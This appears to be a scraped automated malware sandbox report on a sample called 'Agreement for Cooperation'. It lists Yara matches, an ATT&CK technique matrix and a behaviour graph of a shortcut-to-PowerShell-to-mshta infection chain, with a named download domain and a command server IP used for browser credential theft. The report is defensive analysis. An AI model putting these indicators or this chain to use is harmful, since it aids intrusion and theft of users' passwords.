                    Source: Yara matchFile source: 0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 3780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3580, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 3780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3580, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004D696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_004D696E
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004D6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_004D6E32
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009F696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,14_2_009F696E
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009F6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,14_2_009F6E32
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    221
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    Create Account
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter
                    2
                    Valid Accounts
                    2
                    Valid Accounts
                    13
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    11
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    PowerShell
                    1
                    Registry Run Keys / Startup Folder
                    21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS169
                    System Information Discovery
                    Distributed Component Object Model21
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection
                    111
                    Masquerading
                    LSA Secrets261
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    13
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Registry Run Keys / Startup Folder
                    2
                    Valid Accounts
                    Cached Domain Credentials251
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                    Virtualization/Sandbox Evasion
                    DCSync13
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573535 Sample: Agreement for Cooperation.P... Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 60 pict.healthclinic-stylemaven.com 2->60 64 Suricata IDS alerts for network traffic 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Windows shortcut file (LNK) starts blacklisted processes 2->68 70 9 other signatures 2->70 12 ssh.exe 2 2->12         started        15 AutoIt3.exe 2->15         started        17 svchost.exe 1 1 2->17         started        20 AutoIt3.exe 2->20         started        signatures3 process4 dnsIp5 80 Windows shortcut file (LNK) starts blacklisted processes 12->80 22 powershell.exe 7 12->22         started        25 conhost.exe 1 12->25         started        27 InstallUtil.exe 1 15->27         started        56 127.0.0.1 unknown unknown 17->56 29 InstallUtil.exe 20->29         started        signatures6 process7 signatures8 76 Windows shortcut file (LNK) starts blacklisted processes 22->76 78 Powershell drops PE file 22->78 31 powershell.exe 7 22->31         started        process9 signatures10 88 Windows shortcut file (LNK) starts blacklisted processes 31->88 34 mshta.exe 17 31->34         started        process11 dnsIp12 62 pict.healthclinic-stylemaven.com 172.67.223.31, 443, 49704, 49707 CLOUDFLARENETUS United States 34->62 72 Windows shortcut file (LNK) starts blacklisted processes 34->72 74 Suspicious powershell command line found 34->74 38 powershell.exe 14 21 34->38         started        signatures13 process14 file15 52 C:\Users\user\AppData\Local\...\updater.exe, PE32 38->52 dropped 41 updater.exe 1 4 38->41         started        44 conhost.exe 38->44         started        process16 file17 54 C:\ahdccea\AutoIt3.exe, PE32 41->54 dropped 46 InstallUtil.exe 41->46         started        49 InstallUtil.exe 15 26 41->49         started        process18 dnsIp19 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 46->82 84 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 46->84 58 185.147.124.236, 15647, 49716, 49729 E-STYLEISP-ASRU Russian Federation 49->58 86 Tries to harvest and steal browser information (history, passwords, etc) 49->86 signatures20

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.